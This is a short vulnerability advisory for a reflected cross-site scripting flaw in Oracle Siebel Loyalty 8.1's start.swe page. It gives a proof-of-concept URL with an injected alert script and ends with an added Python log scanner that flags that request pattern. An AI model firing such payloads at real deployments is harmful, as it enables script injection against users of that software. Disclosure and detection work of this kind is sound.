Oracle Siebel Loyalty 8.1 cross site scripting

2010.02.28
Credit: thebluegenius
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

--------------------------------------------------------------------
# Exploit Title: Oracle Siebel Loyalty 8.1 XSS Vulnerability
# Date: 24 Feb 2010
# Author: thebluegenius
# Software Link: http://bit.ly/bZ7JdV
# Version: 8.1
# CVE : NA
---------------------------------------------------
Oracle Siebel Loyalty 8.1 XSS Vulnerability.
---------------------------------------------------
By    : Thebluegenius.
Email : rajsm@isac.org.in
Blog  : www.thebluegenius.com.
---------------------------------------------------
Description:

Siebel Loyalty Management provides a unique multi-channel and multi-partner solution that allows organizations to transform loyalty program effectiveness and significantly increase customer retention and value. It supports the entire loyalty marketing lifecycle and includes deep industry and best practices support for member enrollment and management, points accrual and redemption, personalized loyalty promotions and member communications, multi-channel customer care, and cross-industry partner management.

------------------
Vulnerability: XSS
------------------
The start.swe page is affected by the vulnerability. You can execute XSS as given below:

http://server/loyalty_enu/start.swe/%3E%22%3E%3Cscript%3Ealert('Reflected%20XSS')%3C/script%3E

-----------------------------------------------------
Greetz Fly Out to:
1] Amforked() : My good friend
2] Aodrulez : for inspiring me
3] www.Orchidseven.com : for Research
4] www.isac.org.in
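
A defender-side check for the request pattern reported above, as an added example that is not part of the original advisory: it scans access log lines for requests to start.swe whose path info decodes to HTML markup. The combined log format, the sample lines (constructed) and all function names are assumptions.

```python
import re
from urllib.parse import unquote

# Request line of a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that let reflected input close an attribute or open a tag.
MARKUP_RE = re.compile(r'[<>"]')

# Constructed sample log lines; addresses and the query string are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Feb/2010:10:00:01 +0000] '
    '"GET /loyalty_enu/start.swe?view=home HTTP/1.1" 200 5120',
    '192.0.2.11 - - [24/Feb/2010:10:00:07 +0000] '
    '"GET /loyalty_enu/start.swe/%3E%22%3E%3Cscript%3Ealert'
    "('Reflected%20XSS')%3C/script%3E HTTP/1.1\" 200 4312",
    '192.0.2.12 - - [24/Feb/2010:10:00:09 +0000] '
    '"GET /loyalty_enu/start.swe/%253Cb%253E HTTP/1.1" 200 4300',
]

def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded input (%253C) is normalised too."""
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def suspicious_path_info(log_line):
    """Return decoded text after start.swe if it contains markup, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    path = match.group(1).split("?", 1)[0]  # path info only, not the query
    idx = path.lower().find("start.swe")
    if idx == -1:
        return None
    extra = decode_fully(path[idx + len("start.swe"):])
    return extra if MARKUP_RE.search(extra) else None

def scan(lines):
    """Return (line_number, decoded_path_info) for every flagged entry."""
    checked = ((n, suspicious_path_info(l)) for n, l in enumerate(lines, 1))
    return [(n, extra) for n, extra in checked if extra is not None]

if __name__ == "__main__":
    for number, extra in scan(SAMPLE_LOG):
        print(f"line {number}: markup in start.swe path info: {extra!r}")
```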

